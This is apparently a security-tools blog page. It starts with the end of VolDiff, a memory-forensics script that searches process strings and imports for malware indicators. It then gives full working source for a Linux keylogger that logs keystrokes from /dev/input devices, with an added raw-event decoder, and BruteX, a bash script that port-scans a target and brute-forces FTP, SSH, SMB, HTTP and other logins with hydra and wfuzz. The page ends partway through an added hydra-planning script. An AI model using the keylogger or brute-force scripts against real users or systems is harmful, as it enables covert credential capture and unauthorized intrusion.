    vol.py --profile=$profile -f $memory_image strings -S --string-file=$output_dir/tmpfolder/process-strings.tmp &> $output_dir/strings/process-strings-vol.txt

    # finding ips/domains/emails in strings:
    cat $output_dir/strings/process-strings-vol.txt | grep -E '\b(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' | uniq >> $output_dir/tmpfolder/ip-domains.tmp
    cat $output_dir/strings/process-strings-vol.txt | grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | uniq >> $output_dir/tmpfolder/ip-domains.tmp
    cat $output_dir/strings/process-strings-vol.txt | grep -E "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | uniq >> $output_dir/tmpfolder/ip-domains.tmp
    if [[ -s $output_dir/tmpfolder/ip-domains.tmp ]] ; then
      echo -e "\n\nIPs, domains and email addresses found in memory strings." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ip-domains.tmp | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
    fi
    
    # finding other suspicious strings:
    for pattern in Web Antivirus Virtualisation Sandbox Sysinternals Shell Keylogger Filepath Password Powershell Infogathering Executable Banking Encryption Socialsites Other ; do
      if [[ $pattern == "Web" ]] ; then regex_str=$web_regex_str ; fi
      if [[ $pattern == "Antivirus" ]] ; then regex_str=$antivirus_regex_str ; fi
      if [[ $pattern == "Virtualisation" ]] ; then regex_str=$virtualisation_regex_str ; fi
      if [[ $pattern == "Sandbox" ]] ; then regex_str=$sandbox_regex_str ; fi
      if [[ $pattern == "Sysinternals" ]] ; then regex_str=$sysinternals_regex_str ; fi
      if [[ $pattern == "Shell" ]] ; then regex_str=$shell_regex_str ; fi
      if [[ $pattern == "Keylogger" ]] ; then regex_str=$keylogger_regex_str ; fi
      if [[ $pattern == "Filepath" ]] ; then regex_str=$filepath_regex_str ; fi
      if [[ $pattern == "Password" ]] ; then regex_str=$password_regex_str ; fi
      if [[ $pattern == "Powershell" ]] ; then regex_str=$powershell_regex_str ; fi
      if [[ $pattern == "Infogathering" ]] ; then regex_str=$infogathering_regex_str ; fi
      if [[ $pattern == "Executable" ]] ; then regex_str=$exec_regex_str ; fi
      if [[ $pattern == "Banking" ]] ; then regex_str=$banking_regex_str ; fi
      if [[ $pattern == "Encryption" ]] ; then regex_str=$crypto_regex_str ; fi
      if [[ $pattern == "Socialsites" ]] ; then regex_str=$socialsites_regex_str ; fi
      if [[ $pattern == "Other" ]] ; then regex_str=$other_regex_str ; fi

      if grep -E -i $regex_str $output_dir/strings/process-strings-vol.txt > /dev/null ; then
        echo -e "\n\n$pattern strings found in memory." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        grep -E -i $regex_str $output_dir/strings/process-strings-vol.txt | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    ################################ MALWARE CHECKS - IMPORTS ################################

    # analyse import tables in some processes:
    plugin=impscan
    cat $output_dir/malfind/malfind.txt | grep "Address:" | cut -d ' ' -f 4 | sort | uniq > $output_dir/tmpfolder/procids.tmp
    tail -n +4 $output_dir/psscan/psscan.txt | grep -v -E -i $usual_processes | tr -s ' ' | cut -d " " -f 3 | sort | uniq >> $output_dir/tmpfolder/procids.tmp
    cat $output_dir/tmpfolder/procids.tmp | sort | uniq > $output_dir/tmpfolder/pids.tmp

    while read pid; do
      vol.py --profile=$profile -f $memory_image $plugin -p $pid &> $output_dir/tmpfolder/$pid-imports.tmp
      process=`tail -n +4 $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 1-3 | grep -i " "$pid | cut -d ' ' -f 2 | sort | uniq`
      # searching for anti debug import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $anti_debug_imports > $output_dir/tmpfolder/$pid-imports-susp.tmp
      # search for password extraction import functions 
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $password_extract_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for web request import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $web_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for service import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $service_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for process injection import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $process_injection_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for uac bypass import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $uac_bypass_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for misc import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $misc_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      if [[ -s $output_dir/tmpfolder/$pid-imports-susp.tmp ]] ; then
        echo -e "\n\nSuspicious imports in process $process." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '2p' $output_dir/tmpfolder/$pid-imports.tmp >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '3p' $output_dir/tmpfolder/$pid-imports.tmp >> $output_dir/tmpfolder/malware-checks.tmp
        cat $output_dir/tmpfolder/$pid-imports-susp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done < $output_dir/tmpfolder/pids.tmp

  fi

  ################################ REPORT CREATION ################################
  if [[ $@ =~ "--no-report" ]] ; then
    endtime=$(date +%s)
    echo -e "\nAll done in $(($endtime - $starttime)) seconds."
    rm -r $output_dir/tmpfolder &> /dev/null
    notify-send "VolDiff execution completed."
    exit
  fi

  echo -e "Creating a report..."
  report=VolDiff-report.txt
  touch $output_dir/$report
  echo -e " _    __      ______  _ ________" >> $output_dir/$report
  echo -e "| |  / /___  / / __ \(_) __/ __/" >> $output_dir/$report
  echo -e "| | / / __ \/ / / / / / /_/ /_  " >> $output_dir/$report
  echo -e "| |/ / /_/ / / /_/ / / __/ __/  " >> $output_dir/$report
  echo -e "|___/\____/_/_____/_/_/ /_/     " >> $output_dir/$report
  echo -e "\nVolatility analysis report generated by VolDiff v$version." >> $output_dir/$report 
  echo -e "Download the latest VolDiff version from https://github.com/aim4r/VolDiff/.\n" >> $output_dir/$report
  echo -e "Memory image: $memory_image" >> $output_dir/$report
  echo -e "Profile: $profile" >> $output_dir/$report 
  touch $output_dir/tmpfolder/no_new_entries.tmp

  for plugin in "${plugins_to_report_standalone[@]}" ; do
    tail -n +2 $output_dir/$plugin/$plugin.txt > $output_dir/tmpfolder/output_test.tmp
    if [[ -s $output_dir/tmpfolder/output_test.tmp ]] ; then
      echo -e "\n\n$plugin output." >> $output_dir/$report
      echo -e "===========================================================================\n" >> $output_dir/$report
      tail -n +2 $output_dir/$plugin/$plugin.txt >> $output_dir/$report
      # adding hints to help in further analysis:
      if [[ $@ =~ "--add-hints" ]] ; then
        if [[ $plugin = "malfind" ]] ; then
          echo -e "\nHint: Suspicious malfind processes were dumped to disk, and can be reversed as normal or uploaded to VirusTotal." >> $output_dir/$report
        fi
        if [[ $plugin = "psscan" ]] ; then
          echo -e "\nHint: Use procexedump to dump suspcious processes from memory to disk." >> $output_dir/$report
        fi
        if [[ $plugin = "netscan" ]] ; then
          echo -e "\nHint: Translate suspicious IPs to domains using Google/VirusTotal, and search for the associated domains in memory strings." >> $output_dir/$report
        fi
        if [[ $plugin = "iehistory" ]] ; then
          echo -e "\nHint: iehistory can reveal history details of malware that uses the WinINet API." >> $output_dir/$report
        fi
      fi
    else
      echo -e "$plugin" >> $output_dir/tmpfolder/no_new_entries.tmp 
    fi
  done

  # display list of plugins with no notable changes:
  if [[ -s $output_dir/tmpfolder/no_new_entries.tmp ]]; then
    echo -e "\n\nNo output to highlight for the following plugins." >> $output_dir/$report
    echo -e "===========================================================================\n" >> $output_dir/$report
    cat $output_dir/tmpfolder/no_new_entries.tmp >> $output_dir/$report
  fi

  # display list of plugins hidden from report:
  echo -e "\n\nPlugins that were executed but are not included in the report." >> $output_dir/$report
  echo -e "===========================================================================\n" >> $output_dir/$report
  echo -e "handles\ngetsids\npslist\ndlllist\nfilescan\nshimcache\nsvcscan\nshelbags\nsessions\nmessagehooks\neventhooks\nenvars\nmutantscan\natoms\natomscan\ndrivermodule\ndriverscan\ndevicetree\nmodules\nmodscan\nunloadedmodules\ncallbacks\nldrmodules\nprivs\norphanthreads\nidt\ngdt\ndriverirp\ndeskscan\ntimers\ngditimers\nssdt" >> $output_dir/$report

  # add identified process anomalies to the report:
  if [[ $@ =~ "--malware-checks" ]] ; then
    if [[ -s $output_dir/tmpfolder/malware-checks.tmp ]]; then
      echo -e "" >> $output_dir/$report
      echo "   _               _           _         __                 _ _       " >> $output_dir/$report
      echo "  /_\  _ __   __ _| |_   _ ___(_)___    /__\ ___  ___ _   _| | |_ ___ " >> $output_dir/$report
      echo -E " //_\\\\| '_ \\ / _` | | | | / __| / __|  / \\/// _ \\/ __| | | | | __/ __|" >> $output_dir/$report
      echo -E "/  _  \\ | | | (_| | | |_| \\__ \\ \\__ \\ / _  \\  __/\\__ \\ |_| | | |_\\__ \\" >> $output_dir/$report
      echo "\_/ \_/_| |_|\__,_|_|\__, |___/_|___/ \/ \_/\___||___/\__,_|_|\__|___/" >> $output_dir/$report
      echo "                     |___/                                            " >> $output_dir/$report
      cat $output_dir/tmpfolder/malware-checks.tmp >> $output_dir/$report
    fi
  fi

  echo -e "\n\nEnd of report." >> $output_dir/$report
  rm -r $output_dir/tmpfolder &> /dev/null
  endtime=$(date +%s)
   echo -e "\nAll done in $(($endtime - $starttime)) seconds, report saved to $output_dir/$report."
  notify-send "VolDiff execution completed."

fi

 

Download : v1.2.0.zip  | v1.2.0.tar.gz
Source : http://aim4r.github.io/VolDiff/ | Our Post Before

Event_sniffer – linux keylogger based on /dev/input/event* devices.


A little toolset for logging information from /dev/input/event* devices. For the sniffer I first opened the device myself and parsed it; it worked, but it worked much better with the evdev library.

evdev_sniffer.py
----------------
Keyboard sniffer using the evdev library. Writes the logged data to .keylog by default.

event_sniffer.py
----------------
Like evdev_sniffer.py, but without the evdev library.

prerequisites
-------------
https://python-evdev.readthedocs.org/en/latest/
pip2 install evdev


gen_keymap.sh Script:

#!/bin/sh
#
# run as root, uses dumpkeys
#
# Emits a Python dict literal mapping console keycode -> unshifted keysym,
# e.g.  myDict={30:"a",31:"s",...}  built from the currently loaded keymap.
echo 'ev1l blackh4t t00l - just kidding'
echo "myDict={\\"
# dumpkeys lines look like:   keycode  30 = a   A   +a   +A ...
# squeeze the spacing, keep the keycode (field 2) and the first keysym (field 4)
dumpkeys | grep "^keycode" | tr -s ' ' | cut -d ' ' -f 2,4 | sed 's/ /:"/g' | sed -e 's/$/",/g' | tr -d '\n'
echo "}"

map_devices.py Script:

#!/usr/bin/env python2
# script for printing device information of /dev/input/event* devices
#

import os
import sys
import evdev as ev

def checkRoot():
	if os.getuid()!=0:
		print '[*] You need root for that'
		return False
	return True

if not checkRoot():
	sys.exit(1)

devList = ev.list_devices()
devList.reverse()
for inp in devList:
	dev = ev.InputDevice(inp)
	print "-"*60
	print "[%s]" % inp
	print "%s\n%s\n%s" % (dev.name, dev.info,dev.phys)
print "-"*60

evdev_sniffer.py Script:

#!/usr/bin/env python2
#
# ufh 2015
#
# Keyboard sniffer built on python-evdev: reads EV_KEY events from one
# /dev/input/event* device and writes the key-down names to a log file.

import os
import sys
import evdev
import argparse


def rootCheck():
	# /dev/input/event* nodes are root-only (or root:input) on most distributions
	if os.getuid() != 0:
		print '[*] You need r00t privileges to open event devices'
		return False
	return True


def run(args):

	if not rootCheck():
		sys.exit(1)

	# refuse a non-evdev path before touching the log file
	if args.device not in evdev.list_devices():
		print 'Problem opening input: %s is not an evdev device' % args.device
		sys.exit(1)

	dev = evdev.InputDevice(args.device)
	print '[*] Found %s@%s' % (dev.name, dev.phys)

	fw = open(args.outfile, 'wb')
	try:
		for e in dev.read_loop():
			if e.type != evdev.ecodes.EV_KEY:
				continue

			# categorize() returns a KeyEvent with .keycode and .keystate
			ek = evdev.categorize(e)
			# key_down only: key_up (0) and key_hold (2) would duplicate characters
			if ek.keystate != 1:
				continue

			# keycode is a string, or a list when several names share one code
			keycode = ek.keycode if isinstance(ek.keycode, str) else ek.keycode[0]
			if args.output:
				print keycode

			# strip the KEY_/BTN_ prefix: KEY_A -> a, KEY_ENTER -> " ENTER "
			data = keycode.split('_', 1)[-1]
			if data in ('SPACE', 'BACKSPACE', 'TAB', 'ENTER'):
				data = ' %s ' % data
			else:
				data = data.lower()

			fw.write(data)
			fw.flush()
	except KeyboardInterrupt:
		pass
	finally:
		fw.close()


def main():
	parser = argparse.ArgumentParser(prog='evdev_sniffer.py', description='event keyboard sniffer')
	parser.add_argument('-o', '--outfile', dest='outfile', default='.keylog',
		help='where to write the sniffed data (default: .keylog)')
	# event0 is rarely the keyboard; use map_devices.py to find the right node
	parser.add_argument('-d', '--device', dest='device', default='/dev/input/event0',
		help='event device to sniff (default: /dev/input/event0)')
	# a flag, not an option taking a value
	parser.add_argument('-O', '--output', dest='output', action='store_true',
		help='also print logged keycodes to screen')
	args = parser.parse_args()
	run(args)


if __name__ == '__main__':
	main()
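
The README mentions an event_sniffer.py that works without the evdev library but does not show it. The block below is an added example (my code, not the project's event_sniffer.py) of what that entails: decoding the raw struct input_event records that /dev/input/event* yields using only the struct module, then turning key-down events into text while tracking Shift and skipping autorepeat. It assumes Python 3 and a subset of the key codes from linux/input-event-codes.h; the byte stream it decodes is constructed inline, so it runs without root or a real device.

```python
#!/usr/bin/env python3
"""Decode raw Linux input_event records, as an evdev-free keystroke sniffer must.
Added example; not the event_sniffer.py from the project above."""
import struct

# struct input_event { struct timeval time; __u16 type; __u16 code; __s32 value; }
# Native 'l' makes timeval match the platform: 24 bytes on x86_64, 16 on 32-bit.
EVENT_FMT = "llHHi"
EVENT_SIZE = struct.calcsize(EVENT_FMT)

EV_SYN, EV_KEY = 0, 1
KEY_RELEASE, KEY_PRESS, KEY_REPEAT = 0, 1, 2

# Subset of linux/input-event-codes.h (gen_keymap.sh above builds a full table).
KEYMAP = {
    28: "ENTER", 57: "SPACE", 14: "BACKSPACE", 15: "TAB",
    30: "a", 48: "b", 46: "c", 32: "d", 18: "e", 33: "f", 34: "g", 35: "h",
    23: "i", 36: "j", 37: "k", 38: "l", 50: "m", 49: "n", 24: "o", 25: "p",
    16: "q", 19: "r", 31: "s", 20: "t", 22: "u", 47: "v", 17: "w", 45: "x",
    21: "y", 44: "z",
}
SHIFT_KEYS = {42, 54}   # KEY_LEFTSHIFT, KEY_RIGHTSHIFT


def parse_events(buf):
    """Split bytes read from /dev/input/eventN into (type, code, value) tuples.
    A trailing partial record (short read) is ignored rather than mis-parsed."""
    events = []
    for off in range(0, len(buf) - EVENT_SIZE + 1, EVENT_SIZE):
        _sec, _usec, etype, code, value = struct.unpack_from(EVENT_FMT, buf, off)
        events.append((etype, code, value))
    return events


def decode_keystrokes(events):
    """Turn EV_KEY press events into text; Shift uppercases, autorepeat is dropped."""
    out, shift = [], 0
    for etype, code, value in events:
        if etype != EV_KEY:
            continue                      # EV_SYN, EV_MSC, ... carry no key
        if code in SHIFT_KEYS:            # keep a press count so both shifts work
            shift += 1 if value == KEY_PRESS else (-1 if value == KEY_RELEASE else 0)
            continue
        if value != KEY_PRESS:            # ignore release (0) and autorepeat (2)
            continue
        name = KEYMAP.get(code, "<%d>" % code)
        if name == "ENTER":
            out.append("\n")
        elif name == "SPACE":
            out.append(" ")
        elif len(name) == 1:
            out.append(name.upper() if shift > 0 else name)
        else:
            out.append(" %s " % name)
    return "".join(out)


def _ev(etype, code, value):
    """Pack one record the way the kernel would (timestamp zeroed)."""
    return struct.pack(EVENT_FMT, 0, 0, etype, code, value)


# Constructed sample stream: "hi" + space + Shift-h + Enter (with one autorepeat),
# followed by 5 stray bytes standing in for a short read.
SAMPLE = b"".join([
    _ev(EV_KEY, 35, KEY_PRESS), _ev(EV_SYN, 0, 0), _ev(EV_KEY, 35, KEY_RELEASE),
    _ev(EV_KEY, 23, KEY_PRESS), _ev(EV_KEY, 23, KEY_RELEASE),
    _ev(EV_KEY, 57, KEY_PRESS), _ev(EV_KEY, 57, KEY_RELEASE),
    _ev(EV_KEY, 42, KEY_PRESS), _ev(EV_KEY, 35, KEY_PRESS), _ev(EV_KEY, 35, KEY_RELEASE),
    _ev(EV_KEY, 42, KEY_RELEASE),
    _ev(EV_KEY, 28, KEY_PRESS), _ev(EV_KEY, 28, KEY_REPEAT), _ev(EV_KEY, 28, KEY_RELEASE),
]) + b"\x00" * 5


def sniff(path="/dev/input/event0"):
    """Live use (needs root): read raw records from the device and decode them."""
    with open(path, "rb", buffering=0) as dev:
        while True:
            chunk = dev.read(EVENT_SIZE * 64)
            print(decode_keystrokes(parse_events(chunk)), end="", flush=True)


if __name__ == "__main__":
    print(repr(decode_keystrokes(parse_events(SAMPLE))))
```

Run it as root against the node map_devices.py identified, e.g. sniff('/dev/input/event3'). The record size follows the platform's long, which is why the format string uses a native 'l' rather than a fixed width; a 32-bit capture replayed on a 64-bit host needs the format changed to match the capturing machine.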

Source : https://github.com/your-favorite-hacker

BruteX – Automatically brute force all services running on a target.


BruteX is a simple bash script used to brute force all services on a target.
DEPENDENCIES:
1. NMap
2. Hydra
3. Wfuzz
4. SNMPWalk
5. DNSDict

Bash Script:

#!/bin/bash
# BruteX v1.0 by 1N3
# http://crowdshield.com
#
# ABOUT:
# BruteX is a simple bash script used to brute force all services on a target.
#
# USAGE:
# ./brutex <IP/hostname>
#
# DEPENDENCIES:
# 1. NMap
# 2. Hydra
# 3. Wfuzz
# 4. SNMPWalk
# 5. DNSDict

TARGET="$1"
LOOT_DIR="."
USER_FILE="simple-users.txt"
PASS_FILE="password.lst"
DNS_FILE="namelist.txt"
DIRBUST_FILE="dirbuster.txt"
EXT_FILE="dirbuster-ext.txt"
THREADS="30"
COLOR1='\033[91m'
COLOR2='\033[92m'
COLOR3='\033[92m'
RESET='\e[0m'

# UN-COMMENT TO ENABLE PROXY
#export HYDRA_PROXY=socks4://127.0.0.1:9050

if [ -z "$TARGET" ]; then
	echo -e "$COLOR1+ -- --=[http://crowdshield.com"
	echo -e "$COLOR1+ -- --=[BruteX v1.0 by 1N3"
	echo -e "$COLOR1+ -- --=[Usage: brutex <targetip>"
	exit
fi

clear

echo -e "$COLOR1 __________                __         ____  ___$RESET"
echo -e "$COLOR1 \______   \_______ __ ___/  |_  ____ \   \/  /$RESET"
echo -e "$COLOR1  |    |  _/\_  __ \  |  \   __\/ __ \ \     / $RESET"
echo -e "$COLOR1  |    |   \ |  | \/  |  /|  | \  ___/ /     \ $RESET"
echo -e "$COLOR1  |______  / |__|  |____/ |__|  \___  >___/\  \ $RESET"
echo -e "$COLOR1         \/                         \/      \_/$RESET"
echo ""
echo -e "$COLOR1 + -- --=[BruteX v1.0 by 1N3$RESET"
echo -e "$COLOR1 + -- --=[http://crowdshield.com$RESET"
echo ""
echo ""

echo -e "$COLOR3################################### Running Port Scan ##############################$RESET"
nmap -T4 --open $TARGET -oX $LOOT_DIR/nmap/$TARGET.xml
echo ""
echo -e "$COLOR3################################### Running Brute Force ############################$RESET"
port_21=`grep 'portid="21"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_22=`grep 'portid="22"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_23=`grep 'portid="23"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_25=`grep 'portid="25"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_110=`grep 'portid="110"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_111=`grep 'portid="111"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_135=`grep 'portid="135"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_139=`grep 'portid="139"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_162=`grep 'portid="162"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_445=`grep 'portid="445"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/$TARGET.xml | grep open`

if [ -z "$port_21" ]
then
	echo -e "$COLOR1 + -- --=[Port 21 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 21 opened... running tests...$RESET"	
	hydra -L $USER_FILE -P $PASS_FILE $TARGET ftp -t $THREADS -e ns
fi

if [ -z "$port_22" ]
then
	echo -e "$COLOR1 + -- --=[Port 22 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 22 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET ssh -t $THREADS -e ns
fi

if [ -z "$port_23" ]
then
	echo -e "$COLOR1 + -- --=[Port 23 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 23 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET telnet -t $THREADS -e ns
fi

if [ -z "$port_25" ]
then
	echo -e "$COLOR1 + -- --=[Port 25 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 25 opened... running tests...$RESET"	
	hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp -t $THREADS -e ns
fi

if [ -z "$port_80" ]
then
	echo -e "$COLOR1 + -- --=[Port 80 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 80 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -t $THREADS -e ns -m /
	wfuzz -z file,$DIRBUST_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET/FUZZ/
	wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET/FUZZ.FUZ2Z
fi

if [ -z "$port_110" ]
then
	echo -e "$COLOR1 + -- --=[Port 110 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 110 opened... running tests...$RESET"	
	hydra -L $USER_FILE -P $PASS_FILE $TARGET pop3 -t $THREADS -e ns
fi

if [ -z "$port_139" ]
then
	echo -e "$COLOR1 + -- --=[Port 139 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 139 opened... running tests...$RESET"
	# -s selects the port; hydra's -S means "use SSL", which SMB on 139 does not speak
	hydra -L $USER_FILE -P $PASS_FILE $TARGET smb -s 139 -t $THREADS -e ns
fi

if [ -z "$port_162" ]
then
	echo -e "$COLOR1 + -- --=[Port 162 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 162 opened... running tests...$RESET"
	for a in `cat /pentest/lists/wordlist-common-snmp-community-strings.txt`; do snmpwalk $TARGET -c $a; done;
fi

if [ -z "$port_443" ]
then
	echo -e "$COLOR1 + -- --=[Port 443 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 443 opened... running tests...$RESET"
	# https-head: plain http-head would send cleartext HTTP to a TLS port
	hydra -L $USER_FILE -P $PASS_FILE $TARGET https-head -t $THREADS -e ns -m /
	wfuzz -z file,$DIRBUST_FILE --hc 404,403,301 -c -t $THREADS https://$TARGET/FUZZ/
	wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,301 -c -t $THREADS https://$TARGET/FUZZ.FUZ2Z
fi

if [ -z "$port_445" ]
then
	echo -e "$COLOR1 + -- --=[Port 445 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 445 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET smb -s 445 -t $THREADS -e ns
fi

if [ -z "$port_3306" ]
then
	echo -e "$COLOR1 + -- --=[Port 3306 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 3306 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET mysql -t $THREADS -e ns
fi

if [ -z "$port_8000" ]
then
	echo -e "$COLOR1 + -- --=[Port 8000 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 8000 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8000 -t $THREADS -e ns -m /
	wfuzz -z file,$DIRBUST_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8000/FUZZ/
	wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8000/FUZZ.FUZ2Z
fi

if [ -z "$port_8100" ]
then
	echo -e "$COLOR1 + -- --=[Port 8100 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 8100 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8100 -t $THREADS -e ns -m /
	wfuzz -z file,$DIRBUST_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8100/FUZZ/
	wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8100/FUZZ.FUZ2Z
fi

if [ -z "$port_8080" ]
then
	echo -e "$COLOR1 + -- --=[Port 8080 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 8080 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8080 -t $THREADS -e ns -m /
	wfuzz -z file,$DIRBUST_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8080/FUZZ/
	wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,301 -c -t $THREADS http://$TARGET:8080/FUZZ.FUZ2Z
fi

if [ -z "$port_6667" ]
then
	echo -e "$COLOR1 + -- --=[Port 6667 closed... skipping.$RESET"
else
	echo -e "$COLOR2 + -- --=[Port 6667 opened... running tests...$RESET"
	hydra -L $USER_FILE -P $PASS_FILE $TARGET irc -s 6667 -t $THREADS -e ns
fi

echo ""
echo -e "$COLOR3################################### Brute Forcing DNS ###############################$RESET"
dnsdict6 $TARGET $DNS_FILE -4
echo ""
echo -e "$COLOR3################################### Done! ###########################################$RESET"
exit 0
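
BruteX decides what to attack by grepping the nmap XML for portid="N" on a line that also contains "open". That misses services on non-default ports (an sshd on 2222), ignores the protocol, and treats a UDP open|filtered the same as a confirmed TCP open. The block below is an added example, not part of BruteX: it parses the XML with Python's standard ElementTree and derives hydra command lines from nmap's service names, keeping BruteX's default wordlist names and thread count. The nmap output is a constructed sample and SERVICE_MODULES is my own mapping of nmap service names to hydra module names.

```python
#!/usr/bin/env python3
"""Build a hydra plan from nmap -oX output. Added example, not BruteX code."""
import sys
import xml.etree.ElementTree as ET

# nmap service name -> hydra module (assumption: my mapping, not from BruteX)
SERVICE_MODULES = {
    "ftp": "ftp", "ssh": "ssh", "telnet": "telnet", "smtp": "smtp", "pop3": "pop3",
    "netbios-ssn": "smb", "microsoft-ds": "smb", "mysql": "mysql",
    "postgresql": "postgres", "irc": "irc",
    "http": "http-head", "http-alt": "http-head", "http-proxy": "http-head",
    "https": "https-head",
}

# Constructed sample in nmap's XML layout (not a real scan).
SAMPLE_XML = b"""<nmaprun scanner="nmap" args="nmap -T4 -sS -sU 10.0.0.5 -oX out.xml">
<host><status state="up" reason="echo-reply"/>
<address addr="10.0.0.5" addrtype="ipv4"/>
<address addr="00:11:22:33:44:55" addrtype="mac"/>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH"/></port>
<port protocol="tcp" portid="111"><state state="open" reason="syn-ack"/><service name="rpcbind"/></port>
<port protocol="tcp" portid="443"><state state="open" reason="syn-ack"/><service name="http" tunnel="ssl"/></port>
<port protocol="tcp" portid="2222"><state state="open" reason="syn-ack"/><service name="ssh"/></port>
<port protocol="tcp" portid="3306"><state state="closed" reason="reset"/><service name="mysql"/></port>
<port protocol="udp" portid="161"><state state="open" reason="udp-response"/><service name="snmp"/></port>
</ports></host></nmaprun>"""


def open_ports(xml_bytes):
    """Return [(addr, port, proto, service, ssl)] for every port nmap reports as open.
    Only state="open" counts; "open|filtered" and "closed" are dropped."""
    found = []
    root = ET.fromstring(xml_bytes)
    for host in root.iter("host"):
        addr = next((a.get("addr") for a in host.iter("address")
                     if a.get("addrtype") in ("ipv4", "ipv6")), None)
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            ssl = svc is not None and svc.get("tunnel") == "ssl"
            found.append((addr, int(port.get("portid")), port.get("protocol"), name, ssl))
    return found


def hydra_plan(xml_bytes, user_file="simple-users.txt", pass_file="password.lst", threads=30):
    """Return (hydra command lines, open ports with no hydra module)."""
    commands, unhandled = [], []
    for addr, port, proto, name, ssl in open_ports(xml_bytes):
        module = SERVICE_MODULES.get(name)
        if module == "http-head" and ssl:      # http over TLS, as nmap -sV reports 443
            module = "https-head"
        if proto != "tcp" or module is None:
            unhandled.append((port, proto, name))
            continue
        # -s carries the real port, so an sshd on 2222 is attacked as ssh, not skipped
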